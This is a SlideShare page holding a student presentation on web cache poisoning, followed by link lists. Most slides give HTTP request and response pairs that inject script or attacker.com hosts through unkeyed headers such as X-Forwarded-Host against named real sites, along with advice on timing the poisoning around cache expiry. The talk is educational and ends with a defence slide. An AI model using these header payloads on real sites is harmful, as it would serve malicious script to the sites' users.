SlideShare ist ein Scribd-Unternehmen logo

Web Cache Poisoning

Als PPTX, PDF herunterladen
K
KuldeepPandya5

From introduction to advanced web cache poisoning

Internet
1 von 48
Web Cache Poisoning - Kuldeep Pandya
About Me ● A neophyte ● Web enthusiast ● iAm NoT yEt wORkInG iAm sTiLl sTudiNg (◕‿◕)
Overview ● What cache poisoning we are talking about? ● Quickly Recalling Caching ● Case Studies ● Practical Time ● Defense
Web Cache Poisoning at a glance Web Cache Poisoning is NOT ● Web Cache Deception ● Browser Cache Poisoning ● Request Smuggling ● Response Splitting ● DNS Cache Poisoning
How response caching works
Web Cache Poisoning
Cache Keys GET /bootstrap.css HTTP/1.1 Host: example.com User-Agent: Chrome/71.0….Linux/4.15 Blah: … ● Cache Keys are used to uniquely identify cached object
Unkeyed Inputs and key collison GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=english Blah: .. GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=hindi Blah: ..
Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Response: Blah… <title>नमस्ते दुननया</title> Blah...
Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Cached Response: Blah… <title>Hello World</title> Blah...
How do we poison caches? ● Using unkeyed inputs like HTTP Headers ● Using Request Smuggling ● Using Response Splitting ➔ This presentation is focused on exploiting using HTTP Headers
Approach to web cache poisoning
Quick Example On Web Cache Poisoning
A normal request Request: GET /login.php HTTP/1.1 Host: 191.168.56.101 Blah: … Response: Blah: ... <img src=”192.168.56.101/image.png” /> Blah...
A funny request Request: GET /login.php HTTP/1.1 Host: 192.168.56.101 X-Forwarded-Host: lol“/><svg onload=’alert(1)’> Blah: ... Response: Blah: … <img src=”lol"/><svg onload='alert(1)'>/image.png” />
We all like practicals, don’t we?
Case Studies
Cached XSSed Response in redhat.com GET /en?dontpoisoneveryone=1 HTTP/1.1 Host: www.redhat.com X-Forwarded-Host: a."><script>alert(1)</script> HTTP/1.1 200 OK Cache-Control: public, no-cache Blah… <meta property="og:image" content="https://a."><script>alert(1)</script>"/>
Discreet Poisoning ● We just poisoned the cache for https://redhat.com/en?dontpoisoneveryone=1 ● We need to be first to send the request whenever this cache expires in order to poison site’s legitimate users. ● We need to reverse engineer cache expiry system and crawl into documentation to figure out exact time the cached object will be expired.
unity3d.com Request: GET / HTTP/1.1 Host: unity3d.com X-Host: portswigger-labs.net HTTP/1.1 200 OK Via: 1.1 varnish-v4 Age: 174 Cache-Control: public, max-age=1800 … <script src="https://portswigger- labs.net/sites/files/foo.js"></script>
Selective Poisoning GET / HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 … Firefox/60.0 X-Forwarded-Host: a"><iframe onload=alert(1)> HTTP/1.1 200 OK X-Served-By: cache-lhr6335-LHR Vary: User-Agent, Accept-Encoding … <link rel="canonical" href="https://a">a<iframe onload=alert(1)> </iframe>
DOM Poisoning Request: GET /dataset HTTP/1.1 Host: catalog.data.gov X-Forwarded-Host: canary Response: HTTP/1.1 200 OK Age: 32707 X-Cache: Hit from cloudfront … <body data-site-root="https://canary/">
Request: GET /dataset HTTP/1.1 Host: catalog.data.gov X-Forwarded-Host: id.burpcollaborator.net Response: HTTP/1.1 200 OK Age: 32707 X-Cache: Hit from cloudfront … <body data-site- root="https://id.burpcollaborator.net/">
Request: GET /api/i18n/es HTTP/1.1 Host: catalog.data.gov Response: HTTP/1.1 200 OK … {"Show more":"Mostrar más"}
Request: GET /api/i18n/es HTTP/1.1 Host: portswigger-labs.net Response: HTTP/1.1 200 OK … {"Show more":"<svg onload=alert(1)>"}
● A cool feature to install addons in background for marketing purposes ● This feature became famous by forcefully installing Mr.Robot extension in background ● They were using Nginx for caching ● Mozilla sent a weird request which contained Origin header in all lowercase Mozilla SHIELD GET /api/v1/recipe/signed/ HTTP/1.1 Blah: ... origin: null Blah: ...
Request: GET /api/v1/ HTTP/1.1 Host: normandy.cdn.mozilla.net X-Forwarded-Host: xyz.burpcollaborator.net HTTP/1.1 200 OK { ... "recipe-list": "https://xyz.burpcollaborator.net/a pi/v1/recipe/", "recipe-signed": "https://xyz.burpcollaborator.net/a pi/v1/recipe/signed/", ... }
● Signing was there so we couldn’t install any addon of our choice ● Backend mozilla systems that use unsigned recipes let us peek into system and might help us obtain signing key ● But we could still perform a DDoS ● We could install already signed addons
Route Poisoning in goodhire.com ● Some applications dumbly use request headers to generate URLs and use them for routing :) ● goodhire.com is hosted on hubspot.com which is using cloudflare caching server.
Route Poisoning in goodhire.com Request: GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Server: canary Response: HTTP/1.1 404 Not Found CF-Cache-Status: MISS ... <title>HubSpot - Page not found</title> <p>The domain canary does not exist in our system.</p>
Request: GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Host: portswigger-labs- 4223616.hs-sites.com Response: HTTP/1.1 200 OK ... <script>alert(document.domain)</script>
Hidden route poisoning ● This vulnerability was in blog.cloudflare.com which was using its own caching service ● blog.cloudflare.com is hosted using Ghost.
A normal fail response Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: canary Response: HTTP/1.1 302 Found Location: https://ghost.org/fail/
Supplying already hosted website Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: blog.binary.com Response: HTTP/1.1 200 OK Normal response Still No Luck :(
B...bu….but what if we use a website hosted on ghost? Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: noshandnibble.ghost.io Response: HTTP/1.1 302 Found Location: http://noshandnibble.blog/
How much damage can we do with it? ● Files that were cached a. jpg b. png c. pdf d. js e. css
Bypassing mixed-content protection ● Mixed-content is when your website is HTTPS and is requesting some resource via HTTP. ● Browsers block this type of imports and this feature is called mixed-content protection. ● This redirect ghost did was an HTTP rather than HTTPS which was a big obstacle. Again stuck :/
Luckily, bounty hunters helped ● Safari’s HSTS redirect automatically upgrades it to HTTPS ● HSTS is a technique which is used to prevent data from being eavesdropped by upgrading from HTTP to HTTPS. ● Edge’s 302 response completely bypasses mixed- content protection
Chaining unkeyed inputs ● Sometimes, unkeyed inputs only confuse some part of application. ● We will need to chain unkeyed inputs in order to get something useful
Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: xyz Response: HTTP/1.1 200 OK Set-Cookie: locale=en; domain=xyz Request 1
Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Scheme: nothttps Response: HTTP/1.1 301 Moved Permanently Location: https://redacted.net/en Request 2
Request 1 + Request 2 = WCP Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com X-Forwarded-Scheme: nothttps Response: HTTP/1.1 301 Moved Permanently Location: https://attacker.com/en
Open Graph Hijacking ● Here’s everyone’s favourite, facebook hacking! ● Open Graph is a protocol developed by Facebook which allows to integrate between facebook and other apps. ● But what if we cache some malicious page which will in turn share what we want to share? Let’s try it out.
Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com Response: HTTP/1.1 200 OK Cache-Control: max-age=0, private, must- revalidate … <meta property="og:url" content='https://attacker.com/en'/>
Time for practicals!!!
Defense ● Do NOT use caching at all! ● Avoid taking input from headers. ● If do, then include them in cache key. ● Use burp active scanner or Param Miner like tools to find out unkeyed inputs.
Thanks ● Connect with me ○ kuldeep.pandya.77799@Facebook ○ some_dank_boi@Instagram ○ Predator77799@Twitter
Credits James Kettle albinowax@Twitter References: https://portswigger.net/blog/practic al-web-cache-poisoning https://youtu.be/j2RrmNxJZ5c

Empfohlen

Cache poisoning
Cache poisoningCache poisoning
Cache poisoningAlexandraLacatus
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site ScriptingAli Mattash
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
JSON based CSRF
JSON based CSRFJSON based CSRF
JSON based CSRFAmit Dubey
 

Empfohlen

Cache poisoning
Cache poisoningCache poisoning
Cache poisoningAlexandraLacatus
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site ScriptingAli Mattash
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
JSON based CSRF
JSON based CSRFJSON based CSRF
JSON based CSRFAmit Dubey
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basicsn|u - The Open Security Community
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Nabin Dutta
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Daniel Tumser
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)vinayh.vaghamshi _
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerabilitySoumyasanto Sen
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingn|u - The Open Security Community
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Ritesh Gupta
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and AwarenessAbdul Rahman Sherzad
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & DefenseBlueinfy Solutions
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksFelipe Prado
 
Web performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionWeb performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionseanwalbran
 

Weitere ähnliche Inhalte

Was ist angesagt?

Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Nabin Dutta
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Daniel Tumser
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerabilitySoumyasanto Sen
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Ritesh Gupta
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and AwarenessAbdul Rahman Sherzad
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 

Was ist angesagt? (20)

Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerability
 
Web application security
Web application securityWeb application security
Web application security
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 

Ähnlich wie Web Cache Poisoning

DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksFelipe Prado
 
Web performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionWeb performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionseanwalbran
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …Jinglun Li
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
Altitude SF 2017: The power of the network
Altitude SF 2017: The power of the networkAltitude SF 2017: The power of the network
Altitude SF 2017: The power of the networkFastly
 
Design Web Service API by HungerStation
Design Web Service API by HungerStationDesign Web Service API by HungerStation
Design Web Service API by HungerStationArabNet ME
 
Optimising Web Application Frontend
Optimising Web Application FrontendOptimising Web Application Frontend
Optimising Web Application Frontendtkramar
 
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."Dongwook Lee
 
Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014bryan_call
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?timbc
 
Web performance mercadolibre - ECI 2013
Web performance mercadolibre - ECI 2013Web performance mercadolibre - ECI 2013
Web performance mercadolibre - ECI 2013Santiago Aimetta
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
 
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...Ontico
 
Integrated Cache on Netscaler
Integrated Cache on NetscalerIntegrated Cache on Netscaler
Integrated Cache on NetscalerMark Hillick
 
Implementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesImplementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesViet-Hoang Tran
 
HTTP fundamentals for developers
HTTP fundamentals for developersHTTP fundamentals for developers
HTTP fundamentals for developersMario Cardinal
 
AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013Andrew Khoury
 
Generating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status CodesGenerating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status CodesDeeptiJava
 

Ähnlich wie Web Cache Poisoning (20)

DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacks
 
Web performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionWeb performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transition
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTP
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
Altitude SF 2017: The power of the network
Altitude SF 2017: The power of the networkAltitude SF 2017: The power of the network
Altitude SF 2017: The power of the network
 
Design Web Service API by HungerStation
Design Web Service API by HungerStationDesign Web Service API by HungerStation
Design Web Service API by HungerStation
 
Optimising Web Application Frontend
Optimising Web Application FrontendOptimising Web Application Frontend
Optimising Web Application Frontend
 
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
 
Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
Web performance mercadolibre - ECI 2013
Web performance mercadolibre - ECI 2013Web performance mercadolibre - ECI 2013
Web performance mercadolibre - ECI 2013
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
 
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
 
Integrated Cache on Netscaler
Integrated Cache on NetscalerIntegrated Cache on Netscaler
Integrated Cache on Netscaler
 
Implementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesImplementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and Challenges
 
HTTP fundamentals for developers
HTTP fundamentals for developersHTTP fundamentals for developers
HTTP fundamentals for developers
 
HTTP
HTTPHTTP
HTTP
 
AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013
 
Generating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status CodesGenerating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status Codes
 

Kürzlich hochgeladen

办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleanscorenetworkseo
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhimiss dipika
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMartaLoveguard
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 

Kürzlich hochgeladen (20)

办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
